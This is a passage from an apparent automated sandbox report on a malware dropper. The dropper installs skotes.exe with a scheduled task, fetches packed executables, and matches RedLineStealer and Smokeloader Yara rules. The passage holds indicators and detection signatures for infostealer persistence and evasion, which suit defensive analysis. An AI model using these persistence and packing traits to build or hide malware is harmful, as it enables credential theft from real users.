Source: ba17bbfb21.exe.6.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_c55e8ce8-b
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: 4611cc433b.exe.6.dr Static PE information: section name:
Source: 4611cc433b.exe.6.dr Static PE information: section name: .idata
Source: 4611cc433b.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 79ddad050f.exe.6.dr Static PE information: section name:
Source: 79ddad050f.exe.6.dr Static PE information: section name: .idata
Source: 79ddad050f.exe.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: e051bdf457.exe.6.dr Static PE information: section name:
Source: e051bdf457.exe.6.dr Static PE information: section name: .idata
Source: e051bdf457.exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: 734386a52c.exe.6.dr Static PE information: section name:
Source: 734386a52c.exe.6.dr Static PE information: section name: .idata
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0020CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_0020CB97
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD78BB 0_2_00AD78BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD8860 0_2_00AD8860
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD7049 0_2_00AD7049
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD31A8 0_2_00AD31A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA81D3 0_2_00BA81D3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A94B30 0_2_00A94B30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA7B6E 0_2_00BA7B6E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A94DE0 0_2_00A94DE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD2D10 0_2_00AD2D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD779B 0_2_00AD779B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC7F36 0_2_00AC7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00238860 2_2_00238860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00237049 2_2_00237049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_002378BB 2_2_002378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_002331A8 2_2_002331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_001F4B30 2_2_001F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00232D10 2_2_00232D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_001F4DE0 2_2_001F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00227F36 2_2_00227F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0023779B 2_2_0023779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_00238860 3_2_00238860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_00237049 3_2_00237049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_002378BB 3_2_002378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_002331A8 3_2_002331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_001F4B30 3_2_001F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_00232D10 3_2_00232D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_001F4DE0 3_2_001F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_00227F36 3_2_00227F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_0023779B 3_2_0023779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_001FE530 6_2_001FE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00216192 6_2_00216192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00238860 6_2_00238860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_001F4B30 6_2_001F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00232D10 6_2_00232D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_001F4DE0 6_2_001F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00210E13 6_2_00210E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00237049 6_2_00237049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002331A8 6_2_002331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00211602 6_2_00211602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0023779B 6_2_0023779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002378BB 6_2_002378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00213DF1 6_2_00213DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00227F36 6_2_00227F36
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D1FD00 7_3_04D1FD00
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D1DF87 7_3_04D1DF87
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D29706 7_3_04D29706
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D13120 7_3_04D13120
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D122C0 7_3_04D122C0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D1E2C9 7_3_04D1E2C9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D24AEE 7_3_04D24AEE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D1AA90 7_3_04D1AA90
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D25219 7_3_04D25219
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D14350 7_3_04D14350
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00402EC0 7_2_00402EC0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00404F50 7_2_00404F50
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00410900 7_2_00410900
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0041A306 7_2_0041A306
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040EB87 7_2_0040EB87
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00403D20 7_2_00403D20
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00415E19 7_2_00415E19
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040EEC9 7_2_0040EEC9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004156EE 7_2_004156EE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040B690 7_2_0040B690
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_1000E184 7_2_1000E184
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_100102A0 7_2_100102A0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 7_2_0099A491
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_009954B8 7_2_009954B8
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_009390A7 7_2_009390A7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_008258DC 7_2_008258DC
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_009A10F3 7_2_009A10F3
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_008B782B 7_2_008B782B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0085252E 7_2_0085252E
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099397E 7_2_0099397E
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099DA9C 7_2_0099DA9C
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00991EBE 7_2_00991EBE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099C618 7_2_0099C618
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00998A27 7_2_00998A27
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00944675 7_2_00944675
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0084C79E 7_2_0084C79E
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0091C7F6 7_2_0091C7F6
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0086FBEA 7_2_0086FBEA
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00939B50 7_2_00939B50
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0094BB62 7_2_0094BB62
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00AAEE5A 7_2_00AAEE5A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00A20315 7_2_00A20315
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B751B7 7_2_04B751B7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7EDEE 7_2_04B7EDEE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B73F87 7_2_04B73F87
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7B8F7 7_2_04B7B8F7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B751B7 7_2_04B751B7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7F130 7_2_04B7F130
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B85955 7_2_04B85955
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B80B67 7_2_04B80B67
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EAD2AC 9_2_61EAD2AC
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E4B8A1 9_2_61E4B8A1
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E75F1F 9_2_61E75F1F
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E40065 9_2_61E40065
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9E24F 9_2_61E9E24F
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E5023C 9_2_61E5023C
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E62554 9_2_61E62554
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9A4A7 9_2_61E9A4A7
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E4E4BF 9_2_61E4E4BF
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E94783 9_2_61E94783
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E7A790 9_2_61E7A790
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E18736 9_2_61E18736
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E86668 9_2_61E86668
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E58670 9_2_61E58670
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E10856 9_2_61E10856
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA0BA9 9_2_61EA0BA9
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E62CA3 9_2_61E62CA3
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E98FE2 9_2_61E98FE2
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E88FCA 9_2_61E88FCA
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E52F80 9_2_61E52F80
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA2F47 9_2_61EA2F47
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E56F18 9_2_61E56F18
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E4CEF9 9_2_61E4CEF9
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E1EEFF 9_2_61E1EEFF
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E64E0C 9_2_61E64E0C
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA91F6 9_2_61EA91F6
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9316A 9_2_61E9316A
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9F0ED 9_2_61E9F0ED
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA70CF 9_2_61EA70CF
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9D0C3 9_2_61E9D0C3
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E8D0B6 9_2_61E8D0B6
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E6904E 9_2_61E6904E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E4304E 9_2_61E4304E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E15337 9_2_61E15337
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E19208 9_2_61E19208
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E534E3 9_2_61E534E3
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E77452 9_2_61E77452
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E37930 9_2_61E37930
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E7B85E 9_2_61E7B85E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E21816 9_2_61E21816
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9FBF0 9_2_61E9FBF0
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E55BD7 9_2_61E55BD7
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA5B62 9_2_61EA5B62
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E91DC1 9_2_61E91DC1
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E6DDA5 9_2_61E6DDA5
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E31DAB 9_2_61E31DAB
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E95D7A 9_2_61E95D7A
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E5BC4C 9_2_61E5BC4C
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E25FA2 9_2_61E25FA2
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E1DEC2 9_2_61E1DEC2
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E69E8F 9_2_61E69E8F
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E89E0E 9_2_61E89E0E
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00AA80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: String function: 0040A760 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: String function: 04D19B60 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: String function: 04B7A9C7 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0020DF80 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0020D942 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0020D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0020D64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00228E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00207A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 002080C0 appears 393 times
PE file contains executable resources (Code or Archives)
Source: random[1].exe.6.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 4611cc433b.exe.6.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000007.00000002.3265730716.0000000000FFC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.3279910131.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9976143490484429
Source: random[1].exe0.6.dr Static PE information: Section: sbjgrbkb ZLIB complexity 0.9943977255293035
Source: 79ddad050f.exe.6.dr Static PE information: Section: ZLIB complexity 0.9976143490484429
Source: 79ddad050f.exe.6.dr Static PE information: Section: sbjgrbkb ZLIB complexity 0.9943977255293035
Source: random[1].exe1.6.dr Static PE information: Section: dnuvwdxn ZLIB complexity 0.9948512815427621
Source: e051bdf457.exe.6.dr Static PE information: Section: dnuvwdxn ZLIB complexity 0.9948512815427621
Source: random[1].exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 4611cc433b.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@67/35@29/16
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 7_2_00402A20
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00FFD63E CreateToolhelp32Snapshot,Module32First, 7_2_00FFD63E
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 7_2_00401940
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4404:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Command line argument: emp 7_2_00408770
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Command line argument: mixtwo 7_2_00408770
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
